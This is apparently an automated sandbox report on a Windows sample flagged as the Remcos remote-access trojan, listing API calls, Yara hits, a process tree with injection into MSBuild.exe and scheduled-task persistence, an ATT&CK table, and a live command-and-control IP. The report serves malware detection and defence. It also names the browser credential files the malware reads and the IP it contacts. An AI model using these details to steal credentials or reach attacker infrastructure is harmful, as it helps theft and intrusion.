              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433E0A cpuid 12_2_00433E0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 12_2_004470AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 12_2_004510BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_004511E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 12_2_004512EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_004513B7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 12_2_00447597
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 12_2_0040E679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 12_2_00450A7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 12_2_00450CF7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 12_2_00450D42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 12_2_00450DDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 12_2_00450E6A
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00434010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041A7A2 GetUserNameW,12_2_0041A7A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040B21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \key3.db 12_2_0040B335

              Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-T6WK9E
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: cmd.exe 12_2_00405042
MITRE ATT&CK Matrix (tactic: techniques with matching signatures; the number in parentheses is the match count as displayed in the report)

Reconnaissance: no matches
Resource Development: no matches
Initial Access: no matches
Execution: Native API (1), Command and Scripting Interpreter (12), Scheduled Task/Job (1), Service Execution (2)
Persistence: DLL Side-Loading (1), Windows Service (1), Scheduled Task/Job (1)
Privilege Escalation: DLL Side-Loading (1), Bypass User Account Control (1), Access Token Manipulation (1), Windows Service (1), Process Injection (321), Scheduled Task/Job (1)
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1), Bypass User Account Control (1), Masquerading (1), Virtualization/Sandbox Evasion (31), Access Token Manipulation (1), Process Injection (321)
Credential Access: OS Credential Dumping (1), Input Capture (111), Credentials In Files (2)
Discovery: System Time Discovery (2), Account Discovery (1), System Service Discovery (1), File and Directory Discovery (3), System Information Discovery (33), Security Software Discovery (121), Virtualization/Sandbox Evasion (31), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: no matches
Collection: Archive Collected Data (11), Input Capture (111), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (11), Encrypted Channel (22), Non-Standard Port (1), Remote Access Software (1), Application Layer Protocol (11)
Exfiltration: no matches
Impact: System Shutdown/Reboot (1), Defacement (1)

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1576998
Sample: file.exe
Startdate: 17/12/2024
Architecture: WINDOWS
Score: 100
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree:
• file.exe (started)
  • dropped: C:\Users\user\AppData\...\DcBNSgyxoJFip.exe (PE32); C:\...\DcBNSgyxoJFip.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp1B5F.tmp (XML); C:\Users\user\AppData\Local\...\file.exe.log (ASCII)
  • signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
  • MSBuild.exe (started)
    • network: 107.173.4.16, ports 2560, 49711, 49713, AS-COLOCROSSINGUS, United States
    • signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 4 other signatures
  • powershell.exe (started)
    • signatures: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)
• DcBNSgyxoJFip.exe (started)
  • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • MSBuild.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)

Antivirus detection for the submitted sample (Source: Detection, Scanner, Label):
file.exe: 39%, ReversingLabs, ByteCode-MSIL.Infostealer.Pony
file.exe: 100%, Avira, HEUR/AGEN.1305624
file.exe: 100%, Joe Sandbox ML

Antivirus detection for dropped files (Source: Detection, Scanner, Label):
C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe: 100%, Avira, HEUR/AGEN.1305624
C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe: 100%, Joe Sandbox ML
C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe: 39%, ReversingLabs, ByteCode-MSIL.Infostealer.Pony

No Antivirus matches
No Antivirus matches

Antivirus detection for URLs (Source: Detection, Scanner, Label):
https://api.libertyreserve.com/beta/xml/transfer.aspx: 0%, Avira URL Cloud, safe
https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c: 0%, Avira URL Cloud, safe
https://api.libertyreserve.com/beta/xml/history.aspx: 0%, Avira URL Cloud, safe
https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c: 0%, Avira URL Cloud, safe
https://sci.libertyreserve.com/: 0%, Avira URL Cloud, safe
https://api.libertyreserve.com/beta/xml/: 0%, Avira URL Cloud, safe
Contacted domains (Name: IP, Active, Malicious, Antivirus Detection, Reputation):
bg.microsoft.map.fastly.net: 199.232.214.172, active: true, malicious: false, reputation: high
s-part-0035.t-0009.t-msedge.net: 13.107.246.63, active: true, malicious: false, reputation: high
fp2e7a.wpc.phicdn.net: 192.229.221.95, active: true, malicious: false, reputation: high

URLs from memory and binaries (Name: Source, Malicious, Antivirus Detection, Reputation):
http://geoplugin.net/json.gp: source MSBuild.exe, malicious: false, reputation: high
https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c: source file.exe, DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown
https://api.libertyreserve.com/beta/xml/transfer.aspx: source DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown
https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c: source file.exe, DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown
http://geoplugin.net/json.gp/C: source file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, malicious: false, reputation: high
https://sci.libertyreserve.com/: source DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: source file.exe, 00000000.00000002.2168087268.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, DcBNSgyxoJFip.exe, 00000009.00000002.2200731306.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, malicious: false, reputation: high
https://api.libertyreserve.com/beta/xml/history.aspx: source DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown
https://api.libertyreserve.com/beta/xml/: source file.exe, DcBNSgyxoJFip.exe.0.dr, malicious: false, Avira URL Cloud: safe, reputation: unknown

Contacted public IPs (IP: Domain, Country, ASN, ASN Name, Malicious):
107.173.4.16: domain unknown, United States, ASN 36352, AS-COLOCROSSINGUS, malicious: true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576998
Start date and time: 2024-12-17 20:37:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 192
                          • Number of non-executed functions: 220
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.198.118.190, 23.218.208.109, 20.12.23.50, 192.229.221.95, 52.165.164.15, 199.232.214.172, 13.107.246.63
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
Timeline (Time, Type: Description):
14:38:03 API Interceptor: 1x Sleep call for process: file.exe modified
14:38:06 API Interceptor: 11x Sleep call for process: powershell.exe modified
14:38:08 API Interceptor: 1x Sleep call for process: DcBNSgyxoJFip.exe modified
14:38:42 API Interceptor: 4229199x Sleep call for process: MSBuild.exe modified
20:38:08 Task Scheduler: Run new task: DcBNSgyxoJFip path: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
Context for IP 107.173.4.16 (Associated Sample Name / URL: Detection, Threat Name):
• newthingswithgreatupdateiongivenbestthingswithme.hta: malicious, Cobalt Strike, Remcos
• crreatedbestthingswithgreatattitudeneedforthat.hta: malicious, Cobalt Strike, Remcos
• WC5Gv13cOQ.rtf: malicious, Remcos
• BeeaCHpaO4.exe: malicious, Remcos
• na.rtf: malicious, Remcos
• PO-00006799868.xls: malicious, Remcos
• PO-95958694495545.xls: malicious, Remcos
• SecuriteInfo.com.FileRepMalware.12793.28433.exe: malicious, Remcos, GuLoader
• file.exe: malicious, Remcos, GuLoader
• 5UQ2Xybm0q.hta: malicious, Cobalt Strike, Remcos, GuLoader

Context for domain s-part-0035.t-0009.t-msedge.net (Associated Sample Name / URL: Detection, Threat Name, IP):
• nsdksetup.dll: malicious, Unknown, 13.107.246.63
• https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t: malicious, Unknown, 13.107.246.63
• https://t.co/4MnukUbNZX: malicious, HTMLPhisher, 13.107.246.63
• cpu_rootkit.exe: malicious, CobaltStrike, 13.107.246.63
• https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com: malicious, HTMLPhisher, 13.107.246.63
• http://www.delinian.com: malicious, Unknown, 13.107.246.63
• 122046760.bat: malicious, RHADAMANTHYS, 13.107.246.63
• pkqLAMAv96.lnk: malicious, RHADAMANTHYS, 13.107.246.63
• JkICQ13OOY.dll: malicious, Unknown, 13.107.246.63
• r63NANrAHS.js: malicious, Unknown, 13.107.246.63

Context for domain fp2e7a.wpc.phicdn.net (Associated Sample Name / URL: Detection, Threat Name, IP):
• 66DJ2wErLz.exe: malicious, LummaC, 192.229.221.95
• https://flusoprano.com/f/4/0/f24b0aaf975ee65a83aae9b19316ec90.js: malicious, Unknown, 192.229.221.95
• nSs9QIsTua.js: malicious, Unknown, 192.229.221.95
• http://uhsee.com: malicious, Unknown, 192.229.221.95
• veOECiSunn.exe: malicious, Unknown, 192.229.221.95
• z2kJvTjVVa.exe: malicious, Cryptbot, 192.229.221.95
• DQmU06kq9I.exe: malicious, LiteHTTP Bot, 192.229.221.95
• 3fX4NR35LH.exe: malicious, Cryptbot, 192.229.221.95
• a8o2z9Awf6.exe: malicious, Unknown, 192.229.221.95
• BKT2HSG6sZ.exe: malicious, RedLine, 192.229.221.95

Context for domain bg.microsoft.map.fastly.net (Associated Sample Name / URL: Detection, Threat Name, IP):
• https://garfieldthecat.tech/Receipt.html: malicious, WinSearchAbuse, 199.232.210.172
• lavita.msi: malicious, BruteRatel, Latrodectus, 199.232.210.172
• mjjt5kTb4o.lnk: malicious, Unknown, 199.232.214.172
• uEhN67huiV.dll: malicious, Unknown, 199.232.210.172
• Clienter.dll.dll: malicious, Unknown, 199.232.210.172
• Clienter.dll.dll: malicious, Unknown, 199.232.210.172
• Shipping Bill No6239999Dt09122024.PDF.jar: malicious, Caesium Obfuscator, STRRAT, 199.232.214.172
• BwQ1ZjHbt3.bat: malicious, Unknown, 199.232.214.172
• sEOELQpFOB.lnk: malicious, RedLine, 199.232.210.172
• ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk: malicious, RedLine, SectopRAT, 199.232.214.172

Context for ASN AS-COLOCROSSINGUS (Associated Sample Name / URL: Detection, Threat Name, IP):
• SwiftCopy_PaymtRecpt121228.exe: malicious, Remcos, 192.210.150.17
• Document.xla: malicious, Unknown, 172.245.123.12
• greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta: malicious, Cobalt Strike, Remcos, 23.95.235.29
• sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta: malicious, Cobalt Strike, Remcos, 23.95.235.29
• createdbetterthingswithgreatnressgivenmebackwithnice.hta: malicious, Cobalt Strike, FormBook, 172.245.123.12
• ORDER-24171200967.XLS..js: malicious, WSHRat, Caesium Obfuscator, STRRAT, 192.3.220.6
• newthingswithgreatupdateiongivenbestthingswithme.hta: malicious, Cobalt Strike, Remcos, 107.173.4.16
• crreatedbestthingswithgreatattitudeneedforthat.hta: malicious, Cobalt Strike, Remcos, 107.173.4.16
• Smple_Order-048576744759475945.xls: malicious, Unknown, 192.3.179.166
• Smple_Order-048576744759475945.xls: malicious, Unknown, 192.3.179.166
                                              No context
                                              No context
Process: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
